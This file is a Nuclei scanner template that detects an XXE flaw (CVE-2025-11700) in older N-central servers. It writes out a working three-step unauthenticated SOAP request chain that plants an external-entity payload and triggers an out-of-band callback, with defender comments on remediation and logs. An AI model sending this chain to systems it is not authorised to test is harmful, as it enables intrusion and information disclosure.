漏洞描述
N-central versions earlier than 2025.4 are vulnerable to XML External Entity (XXE) injection, which can lead to information disclosure.
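# Nuclei detection template for CVE-2025-11700 (XXE in N-central < 2025.4).
# The page this was taken from had lost all indentation; the nesting below is
# restored so the document parses as YAML again.
# NOTE(review): the `# digest:` trailer at the end of the file is a signature
# over the template as published upstream; after any edit to this file it will
# presumably fail verification until the template is re-signed.
id: CVE-2025-11700

info:
  name: N-central - XML External Entities Injection
  author: DhiyaneshDK,horizon3ai
  severity: high
  description: |
    N-central versions < 2025.4 are vulnerable to an XML External Entities injection leading to information disclosure.
  impact: |
    Attackers can disclose sensitive information by exploiting XML External Entities injection.
  # The only fix stated on this page is the upgrade; no workaround is listed.
  remediation: |
    Update to version 2025.4 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11700
    - https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py
  metadata:
    verified: true
    # Matches the three entries under `http:`.
    max-request: 3
    # Exposure query: lists hosts whose page title is the N-central login page.
    shodan-query: http.title:"N-central Login"
  # `oast`/`oob`: the result depends on an out-of-band callback, so the scanner
  # needs a reachable interactsh server for this template to report anything.
  tags: cve,cve2025,n-central,xxe,oast,oob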
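# Run the three requests in order; `&&` stops the chain as soon as one step's
# matchers fail, so step 3 is only sent after steps 1 and 2 have matched.
flow: http(1) && http(2) && http(3)

variables:
  # Random 10-letter lowercase marker, used as the <name> inside the payload.
  rand: "{{to_lower(rand_text_alpha(10))}}"
  # XML document whose DTD declares an external parameter entity pointing at
  # the scan's interactsh (OAST) host. The probe only references that callback
  # host; it does not reference any local file on the target.
  # Lines are kept unindented inside the block scalar, exactly as on the page.
  xxe_payload: |-
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE servicetemplate [
    <!ENTITY % xxe SYSTEM "http://{{interactsh-url}}">
    %xxe;
    ]>
    <servicetemplate syntaxversion="2.1.0.0">
    <name>{{rand}}</name>
    </servicetemplate>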
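# Three chained SOAP requests. None of them carries credentials or cookies, so
# reachability of /dms/services/ from untrusted networks is what exposes an
# unpatched server to this check.
# The page had dropped the empty line that separates HTTP headers from the
# body in each raw request; it is restored below, otherwise the XML would be
# read as header lines.
# Log-hunting hint for defenders: an applianceLogSubmit call to
# /dms/services/ServerMMS followed by importServiceTemplateFromFile pointing
# at a path under applianceLog/ is the request sequence this template produces.
http:
  # Step 1: sessionHello for appliance ID 3; the response is expected to
  # contain a numeric session ID, which is captured for the next two steps.
  - raw:
      - |
        POST /dms/services/ServerUI HTTP/2
        Host: {{Hostname}}
        Content-Type: text/xml
        Soapaction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <sessionHello>
        <applianceID>3</applianceID>
        </sessionHello>
        </soapenv:Body>
        </soapenv:Envelope>

    # Both matchers must pass. `internal: true` keeps them out of the reported
    # results; they only gate the flow.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - SessionID
          - sessionHelloResponse
        condition: and
        internal: true

      - type: status
        status:
          - 200
        internal: true

    # Captures the digits of the session ID as `sessionid`. Three spellings of
    # the element name are tried; the value is not printed in the output.
    extractors:
      - type: regex
        part: body
        name: sessionid
        group: 1
        regex:
          - '<SessionID[^>]*>(\d+)</SessionID>'
          - '<sessionId>(\d+)</sessionId>'
          - '<sessionID>(\d+)</sessionID>'
        internal: true

  # Step 2: submits the base64-encoded payload as a NETWORK_CHECK_LOG under
  # the captured session ID.
  # NOTE(review): this writes content to the target. The file name read in
  # step 3 ends in `_3`, matching applianceID 3, so presumably that is where
  # this submission is stored and where it remains after the scan - confirm
  # and plan clean-up when scanning production systems.
  - raw:
      - |
        POST /dms/services/ServerMMS HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml; charset=utf-8

        <?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <soapenv:Header/>
        <soapenv:Body>
        <ns1:applianceLogSubmit xmlns:ns1="http://www.n-able.com/mickey">
        <sessionID>{{sessionid}}</sessionID>
        <logType>NETWORK_CHECK_LOG</logType>
        <contents>{{base64(xxe_payload)}}</contents>
        </ns1:applianceLogSubmit>
        </soapenv:Body>
        </soapenv:Envelope>

    # Gate only: the response must contain both words. They are short and
    # unanchored, so this confirms little more than that the call was answered.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - Ok
          - Msg
        condition: and
        internal: true

  # Step 3: asks the server to import a service template from the log file
  # path below, which makes it parse that file as XML.
  - raw:
      - |
        POST /dms/services/ServerUI HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml; charset=utf-8

        <?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <soapenv:Header/>
        <soapenv:Body>
        <ns1:importServiceTemplateFromFile xmlns:ns1="http://www.n-able.com/mickey">
        <ns1:sessionId>{{sessionid}}</ns1:sessionId>
        <ns1:customerId>1</ns1:customerId>
        <ns1:filePath>/opt/nable/webapps/ROOT/applianceLog/network_check_log_3.log</ns1:filePath>
        </ns1:importServiceTemplateFromFile>
        </soapenv:Body>
        </soapenv:Envelope>

    # The only reported matcher: a DNS interaction recorded by interactsh,
    # i.e. the target resolved the external entity's host name. The response
    # body is not inspected.
    # NOTE(review): a target with no outbound DNS to the OAST domain will not
    # be flagged even if unpatched; a negative result is not proof of a fixed
    # version - check the installed version against 2025.4 as well.
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns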
# digest: 4b0a00483046022100d620080a708f8e37b990b6bfcde7c2aced4e4172a2ed06f425d83d03d3cf99f0022100e48be2ff752699a5600a752d93c4212365e3abad4807a6051b9541c5ab806701:922c64590222798bb761d5b6d8e72950